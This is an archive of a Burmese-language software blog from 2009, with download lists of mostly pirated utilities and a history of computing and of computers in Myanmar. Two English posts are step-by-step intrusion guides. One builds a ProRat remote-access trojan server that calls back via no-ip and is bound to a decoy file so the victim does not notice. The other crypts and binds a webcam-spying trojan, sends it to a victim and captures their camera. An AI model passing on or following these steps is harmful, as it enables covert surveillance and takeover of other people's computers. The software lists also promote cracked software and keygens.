Saturday, December 26, 2009

ငယ္ေသာ္လည္း စြမ္းပကားမေသးသည့္ ေဆာ့၀ဲလ္ငယ္မ်ား


ImTOODVDcreatorv2.0.05.0109

ိိဒီေကာင္ေလးကdvd ကူးရင္menu ေလးနဲ႔ေလ


download



EasyPDFtoWordConverterv2.0.3

pdf ကို word ကိုေျပာင္းတဲ့ေနရာမွာ အျမန္ဆံုးပဲဗ်


download




Magicbit.Audio.Converter.v1.2.24.326

mp3ေျပာင္းတဲ့ေဆာ့၀ဲေလးေလ

ိdownload




GIFMovieGearv4.01

animation လုပ္ေပးတဲ့ေဆာ့၀ဲလ္ေလးပါ..ေတာ္ေတာ္ေကာင္းပါတယ္

download


ClockInstall

desktop ေပၚမွာနာရီေလးတင္ထားလို႔ရပါတယ္...အလန္းေလးလဲေပးလို႔ရပါတယ္

္full versionေတာ့မဟုတ္ပါဘူး

download

VCDCutter4.04

ဗီဒီယိုေတြကိုျဖတ္ေတာက္တဲ့ေဆာ့၀ဲေလးပါ..သူမ်ားေတြေျပာေျပာေနတဲ့portableေလးေလ

download

Recuva

recovery လုပ္တဲ့ေနရာမွာသူကအျမန္ဆံုးပဲ

install ကေတာ့စိတ္ညစ္စရာမလိုဘူး .. portable ေလးပါပဲ

ိdownload

myanmarCalendar

ျမန္မာျပကၡဒိန္ေလးပါ..သူကေတာ့ .net frem လိုပါတယ္


download

Bat To Exe Converter

bat file ေတြကိုexe ေျပာင္းတဲ့ေနရာမွာကိုယ့္icon ေလးနဲ႔ေျပာင္းေပးလို႔ရပါတယ္

portable ပါပဲ


download


CCleaner

ကြန္ျပဴတာသန္႔ရွင္းေရးလုပ္တဲ့ေနရာမွာနာမည္ၾကီးပဲ

portable ပါပဲ

ဓါတ္ပံုမပါလာလို႔ေနာက္မွတင္ေတာ့မယ္

download

MediaPlayerClassicv6.4.9.1

windowmedia မွာပါတဲ့ေကာင္းေလးေတာ့မဟုတ္ပါဘူ

သူ႔ကိုၾကိဳက္တာ dvd ကအစ အခုinternet ေပၚမွာနာမည္ၾကီးေနတဲ့ swf ေတြကိုပါဖြင့္နိုင္ပါတယ္

portable ေခၚရမလား install လုပ္တယ္လို႔ပဲေျပာရမလားမသိပါဘူး

double click လုပ္လိုက္တာနဲ႔ start >>>all program ထဲေရာက္သြားပါတယ္

ေတာ္ၾကာဖြင့္လို႔လဲမရဘူးလို႔ ေျပာခံရမွာစိုးလို႔


download

RatsCheddar

ျမန္မာကလုပ္ထားတာပါ taskmanger ေတြဖြင့္မယ္ပိတ္မယ္ေလ ..ဘယ္ကရတာလဲမမွတ္မိေတာ့ဘူး

ေတာ္ေတာ္ေကာင္းပါတယ္

ိdownload

AusLogics_Disk_Defrag


ိိိdisk defregmenget လုပ္တဲ့ေကာင္ေလးပါ ေဆာ့၀ဲလ္နဲ႔လုပ္ေတာ့ ျမန္တာေပါ့

portable ပါပဲ

download


SlowBlitzWV21

chess game ေလးပါ ..အရြယ္ေသးလို႔အထင္မေသးလိုက္ပါနဲ႔

တိုင္းလက္ေရြးစင္ေတြလက္နက္ခ်ထားပါတယ္


ိdownload


ProcessExplorer

taskmanger ပိတ္ထားရင္သူနဲ႔ဖြင့္ၾကည့္လို႔ရပါတယ္

download

jcpicker21colorcod

ေမာက္စ္ေထာက္လိုက္တဲ့ေနရာက ကာလာ code ေတြအလြယ္သိရပါတယ္


download

ထပ္ျပီးတင္ထားပါတယ္ေနာ္

DeepFreezeStandard6.30.020.1818Retail

အခုေခတ္မွာေတာ့virous ရန္ကေနေၾကာက္လို႔ deepfreeze ကာထားတာစတိုင္တစ္ခု

လိုျဖစ္ေနပါျပီ..


ိdownload

Notepadv4.2.2

ပရုိဂရမ္သမားေတြအတြက္လို႕ေျပာတာပါပဲ ..ဘယ္္လိုသံုးရလဲလို႔က်ြန္ေတာ္မသိဘူးေနာ္

ိdouble click ေခါက္ျပီးတာနဲ႔ start>>>all programs ထဲမွာသြားရွာေတာ့ဗ်ိဳ႔

download

ScreenRecorderGoldv2.1Build1725

screen ေပၚမွာလုပ္ထားသမွ်ကို ဗီဒီယိုအေနနဲ႔ျပန္ၾကည့္ခ်င္ရင္ေတာ့ဒီေကာင္ေလးကိုယူထား

download

XPDiskCleaner

ကြန္ပ်ဳတာသန္႔ရွင္းေရးလုပ္တဲ့ေကာင္ေလးပါပဲ


ိိdownload


changedriveicon

ကိုယ့္ကြန္ပ်ဳတာကdrive ေတြကိုလြယ္လြယ္ေလးနဲ႔iconခ်ိန္းေပးလို႔ရပါတယ္

ကိုယ့္ဆီမွာေတာ့icon ေလးေတြရွာထားေပါေနာ္ portable ေလးပါပဲ


download

AudioGrabber1.81

ဒီေကာင္ေလးကိုေတာ့က်ြန္ေတာ္မတင္ေတာ့ဘူးလို႔ေနမလို႔ပဲ

လိုရင္လဲလိုမွာပါ ..CD ကေနတိုက္ရိုက္mp3ေျပာငး္တာပါ

download

အားလံုးေသာသူငယ္ခ်င္းေတြတစ္ခုခုေတာ့ အသံုးတည့္ရင္ေက်နပ္ပါတယ္

ၾကိဳက္တဲ့ေနရာမွာေ၀မွ်နိုင္ပါတယ္

တစ္ခုေတာ့ေျပာပါေစ keyganပါရင္ viroussoftwere ကို ခဏေတာ့ပိတ္ထားေပးပါ


Tuesday, December 8, 2009

Remote pc access software

1. Download PRORAT 1.9 software for remote pc access.

Password for inner files: pro (Thanks Nalin and Mahdi for your valuable feedback).

2. Now, the unzipped file will contain Prorat.exe file. Run the file on your computer.

3. You will see something like this:

PRORAT 1.9 tutorial installation

4. Now, we have to create a server to send it to remote computer for remote pc access. So, click on Create ->Create Prorat server.

5. Now, you will get something like:

Hack remote computer PRORAT 1.9

6. Go to no-ip.com and register for an account.

7. Now, in Pro connective notification, enter in IP(DNS) address, the link provided to you by no-ip and let all remaining fields remain unchecked.

8. Alongwith using Pro connective notification, you can even use your mail address to confirm about server installation.

9. You can even bind the server with a specific file to prevent victim knowing about the server installation on his computer.

10. To change server default icon, click on "Server icon" on left option pane and select any suitable icon according to binded file.

11. Now, when all things are done, hit on "Create server" and you will get server created in Prorat directory. This server is used for remote pc access.

12. This ends server creation part over here. Just refer Remote pc access tutorial for more information.... the best PRORAT 1.9 tutorial I found.

Now, when you have created PRORAT server, next step is to send this server to victim computer and then use PRORAT 1.9 for remote pc access. I will explain in my next PRORAT tutorial about how to connect to remote PRORAT server on remote victim computer and then use this for remote pc access. If you have any problem in this PRORAT 1.9 tutorial for remote pc access, please mention it in comments section.

Enjoy Prorat 1.9 tutorial for remote pc access software...

Tuesday, December 1, 2009

Firefox မွာ အပ္ၿပီး youtube မွ Mp4 Dowload လုပ္နည္း

၁။။ ဒါကေတာ႔ Google မွာ ခုလိုရွာလိုက္တာပါ
အလြယ္တကူသြားခ်င္ရင္ေတာ႔ ဒီေနရာကေနသြားပါ



၂။။


၃။။


၄။။


၅။။


ကဲအဲတာေတြ ၿပီးသြားၿပီးဆိုရင္ http://www.youtube.com/ ကိုဖြင္႔ပါ ေအာက္ကပံုေလးေတြၾကည္႔ ပါ
၆။။


၇။။


၈။။


ကဲပံုေလးေတြ ၾကည္႔ၿပီးေဒါင္းေလာ႔ဆိုတဲ႔ေနရာကိုကလစ္လိုက္ရင္ Mp4 ဆိုၿပီးေပၚတဲ႔ေနရာကို ထပ္ကလစ္လိုက္ရင္သူဟာသူ ေအာ္တိုေဒါင္းေနပါလိမ္႔မယ္လိုင္းေကာင္းရင္ေကာင္းသလိုစက္ေကာင္းရင္ ေကာင္းသလိုေပါ႔လိုင္းေရာ စက္ေရာ ေကာင္းရင္ေတာ႔ ရွယ္ေပါ႔ဗ်ာMp3 ကူးတာလဲပါတယ္ သြားမေဒါင္းနဲ႔ ၾကာတယ္ေစာင္႔ႏိုင္ရင္ေတာ႔လဲ ေဒါင္းေပါ႔အဲတာကို မိမိကြန္ပ်ဴတာရဲ႕ မ်က္ႏွာစာ
မွာကိုခုလို ေအာက္က ပံုေလးအတိုင္းေပၚေနပါလိမ္႔မယ္






Saturday, November 28, 2009

How to hack MSN Webcam

MSN webcam hacker is a software is used to accomplish msn webcam hack. Thus, using this software you can hack msn webcam of the victim. I have provided link for software download... just read on.

How to hack MSN Webcam

MSN Webcam Hacker-hack MSN Webcam:


It's very easy to hack msn using this "Webcam Hacker". Simply follow the steps below to hack MSN webcam.

1. Free Download MSN Webcam Hacker software to hack webcam on MSN


2. Unzip the file to obtain MSN Webcam Hacker to hack MSN webcam.

3. In "Hack Webcam" program folder, you will see two files:
a. Server
b. Client

4. Now, crypt this server as I have explained in my article Crypter to hide our server trojan from victim Antivirus and then bind this crypted server with say any .mp3 file using Binder software. Now, send this binded trojan containing file to your victim and ask him to run it on his computer to hack webcam on MSN.

5. Once he installs server on his computer, run client.exe on your computer to see something like this:

MSN Webcam Hacker

6. Enter his IP address and keep port no. same. Hit on "Connect" and then "Start Capture". Client will start downloading webcam streaming from server on victim computer. Thus, you will be able to record and thus hack webcam on msn.

7. You can try this on yourself by simply running server.exe application on your computer first and then run client.exe and hit on "Connect" (keeping 127.0.01 as IP). Then simply click on "Start Capture".

Note: Your antivirus will go mad on Webcam Hacker and will show your around 3-4 virus alerts. If you're cautious about safety, install Deep Freeze software and then try out this software to hack MSN webcam.

That's it friend. I hope you will find this tutorial on MSN Webcam hacker to hack MSN webcam easy. If you have any problem in using this MSN webcam hack, please mention it in comments.

Enjoy MSN Webcam hack to hack MSN Webcam...

Sunday, November 1, 2009

ကၽြန္ပ်ဴတာ သမိုင္း


ကြန္ပ်ဳတာ

တိုက္ရိုက္အဓိပၸါယ္ျပန္လ်ွင္ သခ်ာၤတြက္စက္ျဖစ္ပါသည္။ တစ္နည္းအားျဖင့္၎မွာ လ်ွပ္စစ္စြမ္းအားနွင့္သခ်ာၤ ပညာရပ္မ်ားအားအသံုးျပဳ၍လုပ္ငန္းရပ္မ်ားအားအဆင္ေျပေခ်ာ ေမႊ႔လြယ္ကူေစရန္ဖန္တီးယူထားသည့္ စက္အမ်ဳိးအစား တစ္ခုျဖစ္ပါသည္။ မွတ္တမ္းမ်ားသိမ္းဆည္းျခင္း (Datastorage)၊ ျပန္လည္ေခၚယူျခင္း(Retrive)၊ အစီအစဥ္မ်ားထည့္သြင္းျခင္းနွင့္ ထုတ္ယူျခင္း(l/O Device)၊ စဥ္းစားတြက္ခ်က္ေပးျခင္း (Calculate) တို႔အားလုပ္ငန္းစဥ္မ်ား အလိုက္အသံုးျပဳနိုင္ရန္စီစဥ္ထားပါသည္။

ကြန္ပ်ဳတာအားတီထြင္ရန္စတင္စဥ္စားခဲ့စဥ္ ထဲကပင္လုပ္ငန္း ရပ္အသီးသီး၌အသံုးျပဳနိုင္ရန္ရည္ရြယ္၍တီထြင္ ့ ခဲျခင္းျဖစ္သည္။စတင္တီထြင္ခဲ့စဥ္အခ်ိန္တြင္ (Analog Computer) နွင့္ (Digital Computer) ဟူ၍တည္ေဆာက္ပံုနွစ္မ်ဳိးရွိ ့ ခဲပါသည္။(Analog Computer)သည္ လ်ွပ္စစ္စြမ္းအားရရွိမွုပမာဏ အနည္းအမ်ားေပၚမူတည္၍အနီးစပ္ဆံုးေဖာ္ျပ ေပးျခင္းျဖင့္လုပ္ေဆာင္ပါသည္။(Digital Computer)သည္ လ်ွပ္စစ္စြမ္းအ ားအတိအက်ရရွိမွုအ ေပၚမူတည္၍လုပ္ေဆာင္ပါသည္။


ကြန္ပ်ဳတာမတိုင္မွီေခတ္၁၆

ရာစုနွစ္ေနွာင္းပိုင္းမွစတင္၍လုပ္ငန္းရပ္အသီးသီးအားလြယ္ကူေခ်ာေမႊ႔႕ ဆင္ေျပေစရန္ပညာရွင္မ်ားမွ[ေပသီး]
(abacus)အားအ ေျခခံ၍ အဆင့္ဆင့္စမ္းသပ္တီထြင္လာခဲ့ၾကပါသည္။ ၁၆၁၄ ခုနွစ္တြင္(John Napier)မွသခ်ာၤပညာရပ္ပိုင္းဆိုင္ရာတြက္ခ်က္မွုမ်ားအ ားအ ဆင္သင့္ၾကည့္ရွုနိုင္ရန္ .၅ ဒႆမငါးေနရာအထိ
အ တိအက်တြက္ယူအ ေျဖထုတ္ေပးထားေသာအ စီအ စဥ ္ (Logarithms)အားတီထြင္ဖန္တီးခဲ့သည္။

၁၆၁၅ တြင္ William Oughtred မွေန၍ (Slide Rule) စနစ္အားတီထြင္ ့ ခဲသည္။(Slide Rule) ဆိုသည္မွာလ်ွင္ျမန္စြာတြက္ခ်က္နိုင္ရန္အ တြက္(Logarithms) စနစ္အားအက်ဥ္းခ်ဴံး စီစဥ္ထားေသာသခ်ာၤ ပညာရပ္ပိုင္းဆိုင္ရာအသံုးခ်မွုမ်ားျဖစ္ပါသည္။ ၎အား ယေန႔ကာလ ေခတ္ေပၚအီလက္ထရြန္းနစ္သခ်ာၤတြက္စက္(Electronic Calculator) မ်ားတြင္အသံုးျပဳထားပါသည္။

၁၆၂၃ တြင္ William Schickardမွသခ်ာၤတြက္စက္၏အ စျဖစ္ေသာ(Mechanical Calculator) အ ားတီထြင္ ့ ခဲပါသည္။ပထမဦးဆံုးစက္ကိရိယာျဖင့္တြက္ခ်က္ျခင္းအ စီအ စဥ္အ ားျပင္သစ္နိုင္ငံသား ျဖစ္သူသခ်ာၤနွင့္ဒႆနိကပညာရွင္ Blaise Pascal မွ၁၆၄၂ ခုနွစ္တြင္တီထြင္ ့ ခဲျပီး ၁၆၄၅ ခုနွစ္တြင္စတင္ထုတ္လုပ္ ့ ခဲပါသည္ ။

၎ကိရိယာအ ားအ လုပ္လုပ္ေဆာင္နိုင္ရန္အ တြက္လက္ျဖင့္ေမာင္းနွင္ရေသာဂီယာ(gear)မ်ား၊စက္သီး (Pulley)မ်ားျဖင့္ဖြဲ႔စည္းတည္ေဆာက္ထားပါသည္။၁၆၇၂-၁၆၇၄ခုနွစ္တြင္ Gottfried Leibniz မွပထမဆံုး(Calculator) အားတီထြင္နိုင္ ့ ခဲပါသည္။၁၈၀၁ ခုနွစ္တြင္ Joseph Marie Jacquard ၏ၾကိဳးပမ္းအားထုတ္မွုျဖင့္အ လို ေလ်ာက္လည္ပတ္နိုင္ေသာယက္ကန္းစက္တစ္မ်ဳိးျဖစ္သည့္(Analytical Engine) ကိုရရွိ ့ ခဲသည္။

၎စက္မွာအ ေပါက္မ်ားစြာပါ၀င္ေသာကဒ္ျပား (Punched-Card) မ်ားျဖင့္ထည့္သြင္းအ သံုးျပဳ ့ ခဲသည္။၁၈၂၀ တြင္ Charles Thomas de Colmar မွပထမဆံုးျပည္စံုေသာတြက္ခ်က္မွုအတိုင္းအတာအ ားတိုးျမႇင့္ေပးခဲ့ပါသည္။

၁၈၂၂ ခုနွစ္တြင္အဂၤလန္နိုင္ငံမွ Charles Babbage သည္ဓါတ္ခြဲစက္(Analytical Engine) တစ္ခုျပဳလုပ္ရန္အ ၾကံရွိ ့ ခဲ၍၎စက္တြင္မည္သည့္တြက္ခ်က္မွုမ်ဳိးမဆိုပါ၀င္ထည့္သြင္းထားသည္။သို႔ရာတြင္၎စက္အ တြက္လိုအ ပ္သည့္ဖြဲ႔စည္းပံုအားတည္ေဆာက္နိုင္ရန္အ တြက္မူယင္းအခ်ိန္ကာလတြင္ပညာရွင္မ်ားအ ေနျဖင့္မ်ားစြာမွအခက္အ ခဲရွိ ့ ခဲၾကပါသည္။

Charles Babbage ၏မူလစိတ္ကူးမွာယင္းစက္သည္အ ခ်က္အလက္ေပါင္းေျမာက္မ်ားစြာအ ားလက္ခံနိုင္၊ထည့္သြင္းနိုင္၊အ ေျဖထုတ္နိုင္ရန္ျဖစ္ပါသည္။

၂၀ ရာစုနွစ္အ ေစာပိုင္းတြင္ေလဟာမီးလံုး (Vacuum Tube) မ်ားအ ားအ သံုးျပဳျခင္းျဖင့္ကြန္ပ်ဳတာစက္မွုပညာမွအီလက္ထေရာနစ္စနစ္သို႔ကူးေျပာင္းလာခဲ့ၾက၍ဂီယာ (Gear) နွင့္စက္သီး (Pulley) တို႔အားမလိုအ ပ္ေတာ့ေခ်။လ်ွပ္စစ္ခလုတ္မ်ားမွတူညိေသာရလဒ္အ ေျဖမ်ားကိုရရွိနိုင္ျပီျဖစ္ပါသည္။

ယင္းတြင္သေကၤတနွစ္ခုပါသည့္ (Binary) ဘာသာမ်ားျဖင့္အသံုးျပဳထားပါသည္။ အခ်က္အလက္နွင့္ ညႊန္ၾကားခ်က္မ်ားအ ား(l/O) ျဖင့္အက်ဥ္းခ်ဳံးထားပါသည္ ၎စနစ္မွာ (0) နွင့္ (၁) နံပါတ္မ်ားအ ားအ ဖြင့္၊အပိတ္ (On/Off) လုပ္ေပးျခင္းျဖင့္လုပ္ငန္းရပ္မ်ားအား၀န္ပိုက်ဳံ႕လာေစပါသည္။

ေလဟာမီးလံုး (Vacuum Tube) မ်ားမွာဂိီယာ (Gear) နွင့္စက္သီး(Pulley)မ်ားထက္ပိုမိုတိက်စြာအ လုပ္လုပ္ေဆာင္လာနိုင္ပါသည္။ Charles Babbage စဥး္စားထားခဲ့သည့္ (Analytical Engine) မွာ ၁၈၃၀
ခုနွစ္ေရာက္မွအ ျပီးသတ္ဖန္တီးနိုင္ ့ ခဲပါသည္။ေနာက္ဆံုးတြင္၎၏စဥ္းစားမွုမ်ားအ ားလံုးသည္ယေန႔ေခတ္ကာလအ သံုးခ်ေနၾကေသာ (Programmable Computer) အ ျဖစ္သို႔ေရာက္ရွိလာခဲ့ပါသည္။

၁၈၉၀ ခုနွစ္တြင္Herman Hollerith မွအ ေမရိကန္သန္းေခါင္စာရင္းမွတ္တမ္းအတြက္ကဒ္ျပားမ်ားအ ားအ ေပါက္ေဖာက္ျခင္းစနစ္(punched-Card System) အ ျဖစ္တိုးျမႇင့္ေပးခဲ့သည္။၁၉၃၆ ခုနွစ္တြင္Alan Turing မွကြန္ပ်ဳတာ၏သခ်ာၤပညာရပ္ပိုင္းဆိုင္ရာသီအ ိုရီမ်ားအား တိုးျမႇင့္ထုတ္လုပ္ ့ ခဲသည္။၁၉၃၈ ခုနွစ္တြင္ Konrad Zuse မွ(Boolean) အကၡရာသခ်ာၤစနစ္အားအသံုးျပဳ၍ပထမဆံုး (Binary Caculator) အ ျဖစ္တည္ေဆာက့္ ခဲသည္ ။


၁၉၃၉ ခုနွစ္တြင္ပထမဆံုး[သခ်ာၤ]နွင့္[ရူပေဗဒ]

ပညာရပ္မ်ားအ ားလ်ွပ္စစ္စြမ္းအ ားျဖင့္အ ဓိကအသံုးျပဳထားျပီး စက္ပိုင္းဆိုင္ရာ တြက္ခ်က္မွုျဖင့္အလုပ္လုပ္နိုင္ေသာ (J V Atanasoff-Barry) ကြန္ပ်ဳတာအား အ ေမရိကနိုင္ငံတြင္တီထြင္ ့ ခဲသည္။၎စက္အားပထမဆံုး ေလဟာမီးလံုးတြဲမ်ားနွင့္အ သံုးျပဳဖန္တီးတည္ေဆာက္ထားခဲ့သည္။ ၎စက္မွာလုပ္ငန္းရပ္တစ္ခုအ တြက္သာပံုေဖာ္ထားပါသည္။ သို႔ရာတြင္အ လြန္ရွည္လ်ားေသာသခ်ာၤပညာရပ္ပိုင္းဆိုင္ရာဇယားၾကီးမ်ား၏တြက္ခ်က္မွုမ်ားအ ားတစ္ခုခ်င္းစီအ နီးစပ္ဆံုးတြက္ခ်က္နိုင္ေအ ာင္ေရးဆြဲခဲ့ပါသည္




ျမန္မာႏိုင္ငံကြန္ပ်ဳတာ သမိုင္း


ျမန္မာႏိုင္ငံတြင္ကြန္ပ်ဴတာ တကၠသိုလ္မဆိုထားဘိကြန္ပ်ဴတာဌာနပင္မရွိေသးမီက (၁၉၇၃ ခုႏွစ္မတိုင္မီက ) တကၠသိုလ္တစ္ခု၏သခ်ၤာဌာနလက္ေအာက္တြင္တြက္ခ်က္ေရးယူနစ္ အ ျဖစ္စတင္ဖဲြ႕ စည္းခဲ့သည္ဟုအဆိုရွိသည္။ လူဦးေရ သန္းေခါင္စာရင္းေကာက္ယူမွတ္တမ္းျပဳစုေသာ ကိစၥရပ္မ်ားကိုကူညီေဆာင္ရြက္ ့ ခဲရေၾကာင္းလည္းသိရသည္။ စကၠဴ ကဒ္ျပားမ်ားကိုစက္ျဖင့္အေပါက္ေဖါက္ၿပီး သံုးရေသာစနစ္ျဖစ္သည္။ ေနာက္ပိုင္းတြင္ပီစီမဟုတ္ေသးေသာ ကြန္ျပဴတာမ်ား တစ္စတစ္စ ေရာက္ရွိလာၿပီး
၀န္ႀကီးဌာနအခ်ဳိ႕တြင္သံုးစဲြလာသည္။


MCCအမည္ျဖင့္ကြန္ျပဴတာပညာဆင့္ပြါးေပးေသာအစုအ ဖဲြ႕ရွိခဲ့ဖူးၿပီး ကြန္ျပဴတာသင္တန္းေက်ာင္း လံုး၀မရွိဆိုဟုသည္။ ေရွးဦးစြာေရာက္ရွိလာေသာ PC တို႔တြင္လည္း CD ROM, Sound card, Mouse စသည္တို႔မပါ၀င္ေသးပဲ DOS Version ျဖင့္ပင္ Run ႏိုင္ေသာ စာစီစာရိုက္အ တြက္ (WordStar) စာရင္းဇယားဆဲြရန္ (Foomtools) စသည့္ေဆာ့ဖ္၀ဲမ်ားသံုးၾကရသည္ဆိုပါသည္။


ေနာက္ပိုင္း (Wordperfect 5.1) ေပၚေပါက္လာၿပီး (Dbase 4), (Lotus 1-2-3) စသည္တို႔အ ျပင္ (Harbor Graphic 3 ), (AutoCAD) စသည္တို႔ ကိုပါသံုးစဲြလာႏိုင္ေၾကာင္းသိရပါသည္။ WINDOWS OS ေပၚလာေသာ အ ေျပာင္းအ လဲၿပီးသည့္တိုင္ ျမန္မာျပည္တြင္ကြန္ျပဴတာျမင္သိထိေတြ႕ဖူးသူအလြန္နည္းပါးၿပီး WINDOW 95 ေပၚေပါက္လာၿပီးမွတစ္စတစ္စျပည္သူလူထုအတြင္း ကြန္ျပဴတာသံုးစဲြႏိုင္ေသာအ ေျခအ ေနေရာက္လာခဲ့ပါသည္။


သင္ၾကားေရးတြင္မူ WINDOWS 3.1 ေခတ္ကပင္ CSS, RS, MCC စေသာ သင္တန္းအ ဖဲြ႕အ စည္းမ်ားလဲေပၚထြန္းလာၿပီး။ ACE, KMD စသည္အဖဲြ႕အ စည္းမ်ားလည္းဆက္လက္ေပၚေပါက္လာေၾကာင္းသိရပါသည္။


ကြန္ျပဴတာဂ်ာနယ္သည္လည္း ျမန္မာ့ကြန္ျပဴတာသမိုင္းတြင္ အ ေရးပါေသာအ ခန္းမွပါ၀င္ေနကာ အ က်ဳိးျပဳပံ႔ပိုးကူညီႏိုင္ ့ ခဲပါသည္။


ဒင္းနစ္၀င္းသိန္း၏အ စီအ စသ္ျဖင့္အ ခ်ဳိ႕အ ေျခခံပညာေက်ာင္းမ်ားအ တြက္ LC630 Macintosh ကြန္ျပဴတာမ်ားအ ေၾကြးေရာင္းခ်ေပးခဲ့ရာမွ ၿမိဳ႔ငယ္ေလးမ်ား၏အထက္တန္းေက်ာင္းမ်ားပါ ကိုယ္ထူကိုယ္ထစနစ္ျဖင့္ Clone PC မ်ား၀ယ္ယူသိမ္းဆည္းျပသေသာအ ေလ့၊ Multimedia classroom မ်ားဖဲြ႕စည္းတည္ေဆာက္ေသာဓေလ့မ်ားထြန္းကားခဲ့သည္ဆိုပါသည္။


ဆက္လက္ၿပီး Network ကြန္ယက္ခ်ိတ္ဆက္ေသာလုပ္ငန္းမ်ားဖံြ႕ၿဖိဳးလာခဲ့ေသာ္လည္း အင္တာနက္ကိုတိုက္ရိုက္မသံုးႏိုင္ေသးပဲ အင္ထရာနက္သံုးၾကရသည္ဆိုပါသည္ ။


Dial up စနစ္ကြန္ယက္ခ်ိတ္ဆက္ပစၥည္းတို႔မွာ ခြင့္ျပဳခ်က္မရလွ်င္သံုးစဲြခြင့္မရွိေသာကန္႕သတ္ပစၥည္းျဖစ္ ့ ခဲရၿပီး
ေနာင္A ခါ IP Star စေလာင္းမ်ားျဖင့္ Internet ခ်ိတ္ဆက္အ သံုးျပဳမႈအ ထိ က်ယ္ျပန္႕လာသည္ဆိုပါသည္။


ကြန္ျပဴတာ၀န္ေဆာင္မႈအပိုင္းတြင္စာစီစာရိုက္လုပ္ငန္းမွာစီးပြားျဖစ္အသြင္ဦးစြာေပၚေပါက္လာၿပီး၊ ကြန္ျပဴတာျဖင့္ ဇာတာဖဲြ႕ေပးျခင္းစသည္တို႔လည္းပိုမိုေစာစီးစြာေပၚေပါက္ဖူးသည္ဆိုပါသည္။စာစီရာမွ ဒီဇိုင္းလုပ္ငန္းမ်ား ထိုမွတဆင့္စီဒီဗီဒီယိုအေခြကူးျခင္း/ MP3 ေျပာင္းေပးျခင္း၊ ငွားရမ္းျခင္း ဓါတ္ပံုအ ေခြထုတ္ျခင္းဗီဒီယိုတည္းျဖတ္ျခင္း ကာတြန္းရုပ္ရွင္ဖန္တီးျခင္း၊ ဂိမ္းဆိုင္မ်ား ဖြင္ျခင္းတို႔ႏွင့္အတူဆိုင္ဘာကေဖးဆိုင္မ်ား ေပၚထြန္းလာသည္အ ထိကမၻာႏွင့္အ ညီရင္ေဘာင္တန္းလိုက္လာႏိုင္သလို IT ပညာရွင္မ်ားလည္း အထိုက္အ ေလ်ာက္ေပၚေပါက္လာၿပီးကြန္ယက္မ်ားခ်ိတ္ဆက္ထိန္းသိမ္းေပးျခင္း ေဆာ့ဖ္၀ဲေရးသားေရာင္းခ်ျခင္း။ Web
page ဒီဇိုင္းေရးဆဲြေၾကာ္ညာေပးျခင္း စသည့္အ တတ္မ်ားလည္းတတ္ကၽြမ္းလာေနၿပီျဖစ္ပါသည္။ ဟက္ကာမ်ားလည္း ရွိသည္ဟုၾကားသိေနရပါသည္။



ကြန္ျပဴတာသမုိင္း


ကြန္ပ်ဴတာဆုိတာ
“ကြန္ပ်ဴတာ”ဆိုတာ ဘာလဲတဲ့ !!

ေျပာရမယ္ဆိုရင္ ... ေသခ်ာတာေတာ့ .. “ကြန္ပ်ဴတာ”ဟာ electronic device (ပစၥည္း) တစ္ခုျဖစ္ပါတယ္။ သူ႔ရဲ႕ စတင္ျဖစ္ေပၚလာတဲ့သမုိင္းေၾကာင္းကို ေလ့လာမယ္ဆိုရင္ဟိုးလြန္ ့ ခဲတဲ့ႏွစ္ေပါင္း (၁၀၀)ေက်ာ္ေလာက္တုန္းကေရွးေခတ္လူသားေတြ သုံးခဲ့တဲ့ … “ေပသီး” (သို႔) ဂဏန္းေပါင္းစက္ (Abacus) ေခတ္ကို ျပန္ေရာက္သြားပါလိမ့္မယ္။အ ဲဒီ (Abacus) “ေပသီး”ကေန အ ေျခခံၿပီး .. လူေတြဟာ ဂဏန္းေပါင္းစက္တီထြင္လာႏိုင္သည္အ ထိ .. ဉာဏ္ရည္ေတြဖြံ႕ၿဖိဳးတိုးတက္လာခဲ့ပါတယ္ .. ။ အဲဒီဂဏန္းေပါင္းစက္မွတစ္ဆင့္ .. မွတ္ဉာဏ္ (Memory) ပိုမိုေကာင္းမြန္ .. တြက္ခ်က္ (processing)ႏိုင္ေသာ
ကြန္ပ်ဴတာေတြအ ထိတီထြင္တိုးတက္လာခဲ့ပါတယ္ … ။ကြန္ပ်ဴတာရယ္လို႔ ျဖစ္ေပၚလာေပမယ့္လည္း .. ကြန္ပ်ဴတာဆိုတဲ့ေရွးသမိုင္းေၾကာင္းေတြထပ္ရွိပါေသးတယ္ … ။


ဒီအ ပင္ကိုဘယ္လိုစိုက္ ့ ခဲလဲ .. ေျမၾသဇာဘယ္လုိသုံးရလဲ .. ေျမၾသဇာအ တြက္ … ႏြားေခ်းဘယ္ႏွစ္ပိႆာ ထည့္ရတယ္… အ ဲဒီအပင္က စုိထိုင္းတဲ့ေနရာမွာ ေပါက္တာလားၿပီးေတာ့ေျခာက္ေသြ႕တဲ့ေနရာမွေပါက္တာလား စသည္ျဖင့္ .. ပုံစံေတြနဲ႔ ..ေလ့လာမယ္ဆိုရင္ .. ဒါက စိုက္ပ်ဳိးေရးသမား အလုပ္ျဖစ္သြားပါျပီ ..။



ပိုဆိုးတာက .. နည္းပညာ (Technology) ဆိုတာကလည္း .. အ ခ်ိန္နဲ႔အမွ် ေျပာင္းလဲတိုးတက္ (update) အ ျမဲျဖစ္ေနတဲ့အ ခ်ိန္ .. ။ဒီအ ခ်ိန္မွာ ကိုယ္က သမိုင္းေၾကာင္းပဲအ ေသးစိတ္ျပန္သြားၿပီးေလ့လာမယ္ဆိုရင္ .. အ ၾကိဳးထူးလာႏိုင္ဖို႔နည္းလမ္းနည္းပါတယ္ .. ။

ေျမာင္းႀကီးႀကီးခုန္ဖို႔ေနာက္ကိုေျခ(၂)လွမ္း၊ (၃)လွမ္းေလာက္လွမ္းလိုက္ပါ။ ၿပီးေတာ့မွ .. အရွိန္နဲ႔ေျပးခုန္လိုက္ .. ကိုယ္လိုခ်င္တဲ့ဟုိဖက္အျခမ္းက .. Update Technology ကိုမေရာက္စရာ အ ေၾကာင္းမရွိပါဘူး .. ။


Computer History
Year/Enter
Computer History
Inventors/Inventions
Computer History
Description of Event
1936
Konrad Zuse - Z1 Computer First freely programmable computer.
1942
John Atanasoff & Clifford Berry
ABC Computer
Who was first in the computing biz is not always as easy as ABC.
1944
Howard Aiken & Grace Hopper
Harvard Mark I Computer
The Harvard Mark 1 computer.
1946
John Presper Eckert & John W. Mauchly
ENIAC 1 Computer
20,000 vacuum tubes later...
1948
Frederic Williams & Tom Kilburn
Manchester Baby Computer & The Williams Tube
Baby and the Williams Tube turn on the memories.
1947/48
John Bardeen, Walter Brattain & Wiliam Shockley
The Transistor
No, a transistor is not a computer, but this invention greatly affected the history of computers.
1951
John Presper Eckert & John W. Mauchly
UNIVAC Computer
First commercial computer & able to pick presidential winners.
1953
International Business Machines
